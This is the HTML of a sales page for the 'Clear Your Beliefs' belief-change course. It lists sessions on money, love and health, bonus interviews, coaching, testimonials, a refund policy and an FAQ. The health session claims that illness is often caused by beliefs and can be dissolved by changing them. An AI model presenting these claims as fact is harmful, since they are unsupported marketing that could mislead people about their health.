exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// 